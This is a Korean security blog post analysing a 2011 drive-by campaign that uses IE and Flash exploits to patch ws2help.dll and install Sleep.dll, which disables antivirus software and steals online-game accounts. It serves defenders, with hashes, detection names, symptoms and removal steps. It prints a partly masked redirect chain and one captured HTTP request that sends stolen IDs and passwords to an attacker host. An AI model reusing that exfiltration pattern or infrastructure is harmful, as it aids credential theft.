울지않는벌새 : Security, Movie & Society

온라인 게임 계정 탈취 목적의 ws2help.dll, Sleep.dll 악성코드 유포 (2011.7.23)

벌새::Analysis
매주 주말마다 벌어지는 중국발 온라인 게임 계정 탈취 목적의 악성코드 유포가 꾸준히 발견되고 있습니다.

이번 시간에는 6월경부터 발견되고 있는 것으로 알려진 ws2help.dll 시스템 파일 패치 및 Sleep.dll 파일을 이용한 보안 제품 무력화와 온라인 게임 계정 정보 수집에 대한 내용을 살펴보도록 하겠습니다.

해당 악성코드와 관련된 이전의 게시글을 함께 참고하시면 이해하시는데 도움이 되시리라 생각됩니다.

[악성코드 유포 경로]

h**p://www.ci**se***.com/common/com_cineseoul.js
 ㄴ h**p://205.2*9.145.*2*/V/G.html
   ㄴ h**p://205.2*9.145.*2*/V/swfobject.js
   ㄴ h**p://205.2*9.145.*2*/V/f102.htm
     ㄴ h**p://205.2*9.145.*2*/V/1.swf
     ㄴ h**p://205.2*9.145.*2*/V/2.swf
   ㄴ h**p://205.2*9.145.*2*/V/x.htm
     ㄴ h**p://205.2*9.145.*2*/V/K.Js
     ㄴ h**p://205.2*9.145.*2*/V/V.exe
   ㄴ h**p://count48.51yes.com/click.aspx?id=481145757&logo=1

해당 악성코드는 영화 관련, 인터넷 신문 등 다양한 사이트에서 Internet Explorer 웹 브라우저 취약점, Adobe Flash Player 취약점을 이용하여 보안 패치가 이루어지지 않은 사용자가 접속시 자동으로 감염시키도록 구성되어 있습니다.

swf 파일에 포함된 ShellCode

해당 유포에 사용된 1.swf, 2.swf 파일 내부에는 쉘코드(ShellCode)가 포함되어 있어, Adobe Flash Player 최신 버전을 사용하지 않는 사용자의 경우 자동으로 감염될 수 있습니다.

참고로 해당 파일에 대하여 알약(ALYac) 2.0 보안 제품에서는 Exploit.SWF.ShellCode.Gen 진단명으로 진단되고 있습니다.

추가로 Internet Explorer 웹 브라우저 취약점을 이용한 x.htm 스크립트에 대하여 알약(ALYac) 2.0 보안 제품에서는 Exploit.JS.CVE-2010-0806.A 진단명으로 진단되고 있으며, 최종적으로 암호화된 V.exe 파일을 다운로드하여 시스템 감염을 유발하고 있습니다.

V.exe 파일의 XOR된 설치 파일(MD5 : 2041331bb0ecb3bd2938e7bbdf60b6e2)에 대하여 avast! 보안 제품에서는 Win32:OnLineGames-FZQ [Trj] (VirScan.org : 11/37) 진단명으로 진단되고 있습니다.

[생성 파일 및 진단 정보]

C:\WINDOWS\system32\2011723102215.dll
※ 해당 파일은 2011(9~10자리 숫자).dll 파일 형태이며, ws2help.dll 백업 파일입니다.

C:\WINDOWS\system32\Sleep.dll
 - MD5 : e6f7fe2bff44a4c9adb447093d6bd32c
 - ALYac 2.0 : Spyware.OnlineGames.ws (VirusTotal : 19/43)

C:\WINDOWS\system32\ws2help.dll :: 파일 변경(악성 파일)
 - MD5 : 4e6262aaee7b1764ffba1ac854831428
 - AhnLab V3 : Win-Trojan/Patched.19968.F (VirusTotal : 3/43)

C:\WINDOWS\system32\ws3help.dll
※ 해당 파일은 ws2help.dll 백업 파일로 정상 파일입니다.


감염된 PC에서는 정상적인 ws2help.dll(Windows Socket 2.0 Helper for Windows NT) 시스템 파일을 ws3help.dll 파일로 백업을 하고, ws2help.dll 파일은 악성 파일로 패치가 이루어지도록 구성되어 있습니다.

이전과 다르게 단순히 파일 크기로는 구분하기 어려우면 파일의 수정한 날짜로 정상 파일과 악성 파일을 짐작할 수 있습니다.

악성 ws2help.dll 파일의 경우 파일 버전이 5.1.2600.2180 버전이며, 원래 정상적인 시스템 파일(Windows XP SP3 기준)은 5.1.2600.5512 버전으로 표시가 되고 있습니다.

ws2help.dll 시스템 파일 패치로 인하여 감염된 환경에서는 재부팅 후부터 Windows 시작시 느린 부팅이 이루어지고 있는 특징을 발견할 수 있습니다.

  1. 바탕 화면 아이콘 이동 불가
  2. Internet Explorer 웹 브라우저 창 미생성(iexplore.exe 프로세스는 실행)
  3. Windows 보안 센터 무력화
  4. 작업 표시줄 기능 이상(빠른 실행 문제, 프로그램 최소화시 창 처리 문제 등)

특히 무력화된 Windows 보안 센터는 사용자가 Windows 방화벽을 실행시키려고 할 경우 정상적으로 동작하지 않는 것을 확인할 수 있습니다.

Sleep.dll

Sleep.dll 파일은 국내 인터넷 사용자들이 많이 사용하거나 자신들의 진단에 영향을 미치는 알약(ALYac), 네이버 백신, V3, 바이러스 체이서(Virus Chaser) 보안 제품의 기능을 무력화하는 기능이 포함되어 있습니다.

또한 사용자가 Internet Explorer 웹 브라우저(iexplore.exe)와 같은 각종 프로세스에 Sleep.dll 모듈을 인젝션(Injection)하여 파일에 등록된 특정 온라인 게임(피망, 넥슨, 한게임, 넷마블 등)에 접속할 경우 계정 정보를 탈취하는 기능을 포함하고 있습니다.

[넷마블 계정 탈취 예시]

GET /msn/net/mail.asp?a1=1&a3=(사용자 ID)&a4=(비밀번호)&r=1814&a12=2011722210619 HTTP/1.1
User-Agent: WinInet
Host: www.zuozhumsn.com
Cache-Control: no-cache

현재 미국(USA)에 위치한 205.209.142.29로 수집된 계정 정보를 이메일 발송하는 동작을 확인할 수 있습니다.

해당 악성코드에 감염된 사용자 중 사용하는 보안 제품이 비정상적으로 동작하여 문제를 해결할 수 없는 경우에는, 보안 업체에서 제공하는 전용 백신을 이용하여 치료하시기 바라며 수동으로 문제를 해결하기 원하시는 분들은 다음의 절차에 따르시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태로 진행하시기 바랍니다.)

1. 윈도우 탐색기를 통해 C:\WINDOWS\system32\Sleep.dll 파일을 Sleep.dll- 파일로 확장자를 변경합니다.

2. C:\WINDOWS\system32\ws2help.dll 파일을 ws2help.dll- 파일로 확장자를 변경합니다.

3. C:\WINDOWS\system32\ws3help.dll 파일을 ws2help.dll 파일로 파일명을 변경합니다.

4. 시스템 재부팅을 합니다.

5. 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\2011723102215.dll
  • C:\WINDOWS\system32\Sleep.dll-
  • C:\WINDOWS\system32\ws2help.dll-

현재 이들 악성코드는 하우리 바이로봇(Hauri ViRobot) 보안 제품 동작에는 영향을 주지 않는 것으로 알려져 있으므로, 해당 제품을 이용하여 진단 및 치료를 하시는 것도 좋은 해결 방법 중의 하나입니다.

정상적인 인터넷 사이트가 해킹을 당하여 취약점을 이용한 악성코드를 유포하는 행위는 사용자 입장에서는 보안 제품 중심의 대응보다는 Windows 보안 업데이트, 각종 응용 프로그램(Adobe Flash Player, Adobe Reader 등) 최신 버전 사용을 통해 근본적으로 예방할 수 있으므로 항상 업데이트를 체크하는 습관이 중요하겠습니다.